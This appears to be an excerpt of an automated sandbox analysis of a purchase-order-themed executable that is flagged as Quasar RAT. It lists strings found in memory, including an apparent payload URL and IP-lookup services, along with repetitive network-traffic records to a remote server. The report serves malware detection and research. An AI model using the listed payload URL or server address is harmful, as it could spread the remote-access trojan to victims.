                    Source: Directory.exe, 00000005.00000002.4589476945.0000000002BB9000.00000004.00000800.00020000.00000000.sdmp, Directory.exe, 00000005.00000002.4589476945.0000000002EC4000.00000004.00000800.00020000.00000000.sdmp, Directory.exe, 00000005.00000002.4589476945.0000000002F79000.00000004.00000800.00020000.00000000.sdmp, Directory.exe, 00000005.00000002.4589476945.0000000002FE7000.00000004.00000800.00020000.00000000.sdmp, Directory.exe, 00000005.00000002.4589476945.0000000002D93000.00000004.00000800.00020000.00000000.sdmp, Directory.exe, 00000005.00000002.4589476945.0000000002BDD000.00000004.00000800.00020000.00000000.sdmp, Directory.exe, 00000005.00000002.4589476945.000000000304D000.00000004.00000800.00020000.00000000.sdmp, Directory.exe, 00000005.00000002.4589476945.0000000002D47000.00000004.00000800.00020000.00000000.sdmp, Directory.exe, 00000005.00000002.4589476945.0000000002BC3000.00000004.00000800.00020000.00000000.sdmp, Directory.exe, 00000005.00000002.4589476945.00000000029F7000.00000004.00000800.00020000.00000000.sdmp, Directory.exe, 00000005.00000002.4589476945.0000000002D7D000.00000004.00000800.00020000.00000000.sdmp, Directory.exe, 00000005.00000002.4589476945.0000000002FDB000.00000004.00000800.00020000.00000000.sdmp, Directory.exe, 00000005.00000002.4589476945.0000000002A7D000.00000004.00000800.00020000.00000000.sdmp, Directory.exe, 00000005.00000002.4589476945.0000000002C38000.00000004.00000800.00020000.00000000.sdmp, Directory.exe, 00000005.00000002.4589476945.0000000002F80000.00000004.00000800.00020000.00000000.sdmp, Directory.exe, 00000005.00000002.4589476945.0000000002F93000.00000004.00000800.00020000.00000000.sdmp, Directory.exe, 00000005.00000002.4589476945.0000000002A65000.00000004.00000800.00020000.00000000.sdmp, Directory.exe, 00000005.00000002.4589476945.0000000003007000.00000004.00000800.00020000.00000000.sdmp, Directory.exe, 00000005.00000002.4589476945.0000000002D6B000.00000004.00000800.00020000.00000000.sdmp, Directory.exe, 00000005.00000002.4589476945.00000000029B3000.00000004.00000800.00020000.00000000.sdmp, Directory.exe, 00000005.00000002.4589476945.0000000002D86000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://sierrassinfinusadas.com.ard
                    Source: PO#83298373729383838392387373873PDF.exe, 00000000.00000002.2227430823.0000000003B78000.00000004.00000800.00020000.00000000.sdmp, PO#83298373729383838392387373873PDF.exe, 00000000.00000002.2241711429.00000000079E2000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000002.00000002.4584532065.00000000007C2000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: https://api.ipify.org/
                    Source: PO#83298373729383838392387373873PDF.exe, 00000000.00000002.2239194272.0000000006AB0000.00000004.08000000.00040000.00000000.sdmpString found in binary or memory: https://github.com/mgravell/protobuf-net
                    Source: PO#83298373729383838392387373873PDF.exe, 00000000.00000002.2239194272.0000000006AB0000.00000004.08000000.00040000.00000000.sdmpString found in binary or memory: https://github.com/mgravell/protobuf-netJ
                    Source: PO#83298373729383838392387373873PDF.exe, 00000000.00000002.2239194272.0000000006AB0000.00000004.08000000.00040000.00000000.sdmpString found in binary or memory: https://github.com/mgravell/protobuf-neti
                    Source: PO#83298373729383838392387373873PDF.exe, 00000000.00000002.2227430823.0000000003B78000.00000004.00000800.00020000.00000000.sdmp, PO#83298373729383838392387373873PDF.exe, 00000000.00000002.2241711429.00000000079E2000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000002.00000002.4584532065.00000000007C2000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: https://ipwho.is/
                    Source: PO#83298373729383838392387373873PDF.exe, 00000000.00000002.2200782194.0000000002B71000.00000004.00000800.00020000.00000000.sdmp, Directory.exe, 00000005.00000002.4589476945.000000000299A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://sierrassinfinusadas.com.ar
                    Source: PO#83298373729383838392387373873PDF.exe, 00000000.00000002.2200782194.0000000002B71000.00000004.00000800.00020000.00000000.sdmp, Directory.exe, 00000005.00000002.4589476945.0000000002938000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://sierrassinfinusadas.com.ar/rindasq/Mktxz.vdf
                    Source: Directory.exe, 00000005.00000002.4589476945.0000000002F9D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://sierrassinfinusadas.com.ar/rindasq/Mktxz.vdf(B
                    Source: Directory.exe, 00000005.00000002.4589476945.0000000002E55000.00000004.00000800.00020000.00000000.sdmp, Directory.exe, 00000005.00000002.4589476945.0000000002EC4000.00000004.00000800.00020000.00000000.sdmp, Directory.exe, 00000005.00000002.4589476945.0000000002D93000.00000004.00000800.00020000.00000000.sdmp, Directory.exe, 00000005.00000002.4589476945.000000000304D000.00000004.00000800.00020000.00000000.sdmp, Directory.exe, 00000005.00000002.4589476945.0000000002D7D000.00000004.00000800.00020000.00000000.sdmp, Directory.exe, 00000005.00000002.4589476945.0000000002FDB000.00000004.00000800.00020000.00000000.sdmp, Directory.exe, 00000005.00000002.4589476945.0000000002F80000.00000004.00000800.00020000.00000000.sdmp, Directory.exe, 00000005.00000002.4589476945.0000000003007000.00000004.00000800.00020000.00000000.sdmp, Directory.exe, 00000005.00000002.4589476945.0000000002A46000.00000004.00000800.00020000.00000000.sdmp, Directory.exe, 00000005.00000002.4589476945.0000000002E87000.00000004.00000800.00020000.00000000.sdmp, Directory.exe, 00000005.00000002.4589476945.0000000002BE5000.00000004.00000800.00020000.00000000.sdmp, Directory.exe, 00000005.00000002.4589476945.0000000002FF8000.00000004.00000800.00020000.00000000.sdmp, Directory.exe, 00000005.00000002.4589476945.0000000002EDD000.00000004.00000800.00020000.00000000.sdmp, Directory.exe, 00000005.00000002.4589476945.0000000002F5A000.00000004.00000800.00020000.00000000.sdmp, Directory.exe, 00000005.00000002.4589476945.0000000002E36000.00000004.00000800.00020000.00000000.sdmp, Directory.exe, 00000005.00000002.4589476945.0000000002E09000.00000004.00000800.00020000.00000000.sdmp, Directory.exe, 00000005.00000002.4589476945.0000000002E77000.00000004.00000800.00020000.00000000.sdmp, Directory.exe, 00000005.00000002.4589476945.0000000002F9D000.00000004.00000800.00020000.00000000.sdmp, Directory.exe, 00000005.00000002.4589476945.0000000002E5D000.00000004.00000800.00020000.00000000.sdmp, Directory.exe, 00000005.00000002.4589476945.0000000002FC5000.00000004.00000800.00020000.00000000.sdmp, Directory.exe, 00000005.00000002.4589476945.0000000002EB7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://sierrassinfinusadas.com.ar/rindasq/Mktxz.vdfL
                    Source: Directory.exe, 00000005.00000002.4589476945.0000000002EC4000.00000004.00000800.00020000.00000000.sdmp, Directory.exe, 00000005.00000002.4589476945.0000000002F79000.00000004.00000800.00020000.00000000.sdmp, Directory.exe, 00000005.00000002.4589476945.0000000002FE7000.00000004.00000800.00020000.00000000.sdmp, Directory.exe, 00000005.00000002.4589476945.000000000304D000.00000004.00000800.00020000.00000000.sdmp, Directory.exe, 00000005.00000002.4589476945.0000000002FDB000.00000004.00000800.00020000.00000000.sdmp, Directory.exe, 00000005.00000002.4589476945.0000000002F80000.00000004.00000800.00020000.00000000.sdmp, Directory.exe, 00000005.00000002.4589476945.0000000002F93000.00000004.00000800.00020000.00000000.sdmp, Directory.exe, 00000005.00000002.4589476945.0000000003007000.00000004.00000800.00020000.00000000.sdmp, Directory.exe, 00000005.00000002.4589476945.0000000002D86000.00000004.00000800.00020000.00000000.sdmp, Directory.exe, 00000005.00000002.4589476945.0000000002E87000.00000004.00000800.00020000.00000000.sdmp, Directory.exe, 00000005.00000002.4589476945.0000000002FF8000.00000004.00000800.00020000.00000000.sdmp, Directory.exe, 00000005.00000002.4589476945.0000000002F5A000.00000004.00000800.00020000.00000000.sdmp, Directory.exe, 00000005.00000002.4589476945.0000000002FBC000.00000004.00000800.00020000.00000000.sdmp, Directory.exe, 00000005.00000002.4589476945.0000000002E36000.00000004.00000800.00020000.00000000.sdmp, Directory.exe, 00000005.00000002.4589476945.0000000002E09000.00000004.00000800.00020000.00000000.sdmp, Directory.exe, 00000005.00000002.4589476945.0000000002E77000.00000004.00000800.00020000.00000000.sdmp, Directory.exe, 00000005.00000002.4589476945.0000000002DED000.00000004.00000800.00020000.00000000.sdmp, Directory.exe, 00000005.00000002.4589476945.0000000002F9D000.00000004.00000800.00020000.00000000.sdmp, Directory.exe, 00000005.00000002.4589476945.0000000002E5D000.00000004.00000800.00020000.00000000.sdmp, Directory.exe, 00000005.00000002.4589476945.0000000002FC5000.00000004.00000800.00020000.00000000.sdmp, Directory.exe, 00000005.00000002.4589476945.0000000002D75000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://sierrassinfinusadas.com.arD
                    Source: PO#83298373729383838392387373873PDF.exe, 00000000.00000002.2239194272.0000000006AB0000.00000004.08000000.00040000.00000000.sdmp, PO#83298373729383838392387373873PDF.exe, 00000000.00000002.2227430823.0000000003B78000.00000004.00000800.00020000.00000000.sdmp, PO#83298373729383838392387373873PDF.exe, 00000000.00000002.2241711429.00000000079E2000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000002.00000002.4584532065.00000000007C2000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: https://stackoverflow.com/q/11564914/23354;
                    Source: PO#83298373729383838392387373873PDF.exe, 00000000.00000002.2239194272.0000000006AB0000.00000004.08000000.00040000.00000000.sdmp, PO#83298373729383838392387373873PDF.exe, 00000000.00000002.2227430823.0000000003B78000.00000004.00000800.00020000.00000000.sdmp, PO#83298373729383838392387373873PDF.exe, 00000000.00000002.2200782194.0000000002B71000.00000004.00000800.00020000.00000000.sdmp, PO#83298373729383838392387373873PDF.exe, 00000000.00000002.2241711429.00000000079E2000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000002.00000002.4592317023.0000000002B1C000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000002.00000002.4584532065.00000000007C2000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: https://stackoverflow.com/q/14436606/23354
                    Source: PO#83298373729383838392387373873PDF.exe, 00000000.00000002.2239194272.0000000006AB0000.00000004.08000000.00040000.00000000.sdmpString found in binary or memory: https://stackoverflow.com/q/2152978/23354
                    Source: PO#83298373729383838392387373873PDF.exe, 00000000.00000002.2227430823.0000000003B78000.00000004.00000800.00020000.00000000.sdmp, PO#83298373729383838392387373873PDF.exe, 00000000.00000002.2241711429.00000000079E2000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000002.00000002.4584532065.00000000007C2000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: https://stackoverflow.com/q/2152978/23354sCannot
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49985
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49742
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49861
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50175
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49932 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50177
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50058
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50179
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50180
                    Source: unknownNetwork traffic detected: HTTP traffic on port 50131 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 50154 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50182
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50183
                    Source: unknownNetwork traffic detected: HTTP traffic on port 50068 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 50102 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 50045 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 50125 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 50177 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49737
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49977
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49854
                    Source: unknownNetwork traffic detected: HTTP traffic on port 50085 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49950 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 50039 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49971
                    Source: unknownNetwork traffic detected: HTTP traffic on port 50010 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 50165 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50064
                    Source: unknownNetwork traffic detected: HTTP traffic on port 50091 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49893 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50068
                    Source: unknownNetwork traffic detected: HTTP traffic on port 50183 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50070
                    Source: unknownNetwork traffic detected: HTTP traffic on port 50107 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 50004 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50072
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49806 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 50080 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49847
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49886 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49964
                    Source: unknownNetwork traffic detected: HTTP traffic on port 50120 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49840
                    Source: unknownNetwork traffic detected: HTTP traffic on port 50147 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49834 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50075
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50077
                    Source: unknownNetwork traffic detected: HTTP traffic on port 50114 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50081
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50080
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50083
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50085
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49847 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49958
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49834
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49950
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49944 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50087
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50089
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50088
                    Source: unknownNetwork traffic detected: HTTP traffic on port 50051 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50091
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50093
                    Source: unknownNetwork traffic detected: HTTP traffic on port 50153 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 50023 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50095
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49707
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49827
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49737 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49944
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49788
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50139
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49813 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49782
                    Source: unknownNetwork traffic detected: HTTP traffic on port 50149 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50010
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50131
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50133
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50135
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50016
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50137
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49868 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50149
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49707 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49774
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49893
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50141
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50023
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50143
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49742 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50025
                    Source: unknownNetwork traffic detected: HTTP traffic on port 50095 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50145
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50027
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49879 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50147
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49985 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50151
                    Source: unknownNetwork traffic detected: HTTP traffic on port 50103 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49769
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49886
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50039
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49763
                    Source: unknownNetwork traffic detected: HTTP traffic on port 50166 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 50143 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49840 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50153
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50033
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50154
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50156
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50158
                    Source: unknownNetwork traffic detected: HTTP traffic on port 50182 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49801 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50160
                    Source: unknownNetwork traffic detected: HTTP traffic on port 50137 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50162
                    Source: unknownNetwork traffic detected: HTTP traffic on port 50083 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 50089 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49879
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49757
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49997
                    Source: unknownNetwork traffic detected: HTTP traffic on port 50121 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49873
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49751
                    Source: unknownNetwork traffic detected: HTTP traffic on port 50016 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49992
                    Source: unknownNetwork traffic detected: HTTP traffic on port 50033 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 50171 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50045
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50166
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50165
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50168
                    Source: unknownNetwork traffic detected: HTTP traffic on port 50109 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 50072 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50171
                    Source: unknownNetwork traffic detected: HTTP traffic on port 50027 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 50160 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50173
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50051
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49868
                    Source: unknownNetwork traffic detected: HTTP traffic on port 50145 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 50168 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 50139 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 50151 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 50116 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49769 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49912 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49958 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 50180 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49906 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50105
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50107
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50109
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50100
                    Source: unknownNetwork traffic detected: HTTP traffic on port 50077 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50102
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49763 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50103
                    Source: unknownNetwork traffic detected: HTTP traffic on port 50025 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49964 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 50162 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49861 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49901 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 50088 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50116
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50118
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49873 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50111
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50112
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50114
                    Source: unknownNetwork traffic detected: HTTP traffic on port 50133 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 50156 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49751 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49992 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 50127 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 50175 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 50100 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49774 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49782 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49757 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50127
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50129
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49794
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50120
                    Source: unknownNetwork traffic detected: HTTP traffic on port 50093 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50121
                    Source: unknownNetwork traffic detected: HTTP traffic on port 50111 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50123
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50004
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50125
                    Source: unknownNetwork traffic detected: HTTP traffic on port 50105 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49997 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49821
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50098
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50097
                    Source: unknownNetwork traffic detected: HTTP traffic on port 50112 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 50075 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 50158 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 50129 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 50135 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49937
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49977 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 50081 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49813
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49932
                    Source: unknownNetwork traffic detected: HTTP traffic on port 50087 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49925 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 50064 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 50123 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 50173 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49919 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49971 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 50070 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49788 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49794 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 50098 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49827 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49806
                    Source: unknownNetwork traffic detected: HTTP traffic on port 50141 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49925
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49801
                    Source: unknownNetwork traffic detected: HTTP traffic on port 50118 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49821 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49854 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 50179 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49937 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49919
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49912
                    Source: unknownNetwork traffic detected: HTTP traffic on port 50058 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 50097 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49906
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49901
                    Source: unknownHTTPS traffic detected: 167.250.5.91:443 -> 192.168.2.6:49707 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 167.250.5.91:443 -> 192.168.2.6:49737 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 167.250.5.91:443 -> 192.168.2.6:50025 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 167.250.5.91:443 -> 192.168.2.6:50027 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 167.250.5.91:443 -> 192.168.2.6:50051 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 167.250.5.91:443 -> 192.168.2.6:50081 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 167.250.5.91:443 -> 192.168.2.6:50088 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 167.250.5.91:443 -> 192.168.2.6:50089 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 167.250.5.91:443 -> 192.168.2.6:50097 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 167.250.5.91:443 -> 192.168.2.6:50098 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 167.250.5.91:443 -> 192.168.2.6:50100 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 167.250.5.91:443 -> 192.168.2.6:50103 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 167.250.5.91:443 -> 192.168.2.6:50112 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 167.250.5.91:443 -> 192.168.2.6:50118 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 167.250.5.91:443 -> 192.168.2.6:50121 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 167.250.5.91:443 -> 192.168.2.6:50143 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 167.250.5.91:443 -> 192.168.2.6:50149 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 167.250.5.91:443 -> 192.168.2.6:50154 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 167.250.5.91:443 -> 192.168.2.6:50162 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 167.250.5.91:443 -> 192.168.2.6:50166 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 167.250.5.91:443 -> 192.168.2.6:50171 version: TLS 1.2

                    E-Banking Fraud

                    barindex
                    Yara detected Quasar RAT
                    Source: Yara matchFile source: 0.2.PO#83298373729383838392387373873PDF.exe.7b0ba40.10.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 2.2.InstallUtil.exe.7c0000.0.unpack, type: UNPACKEDPE
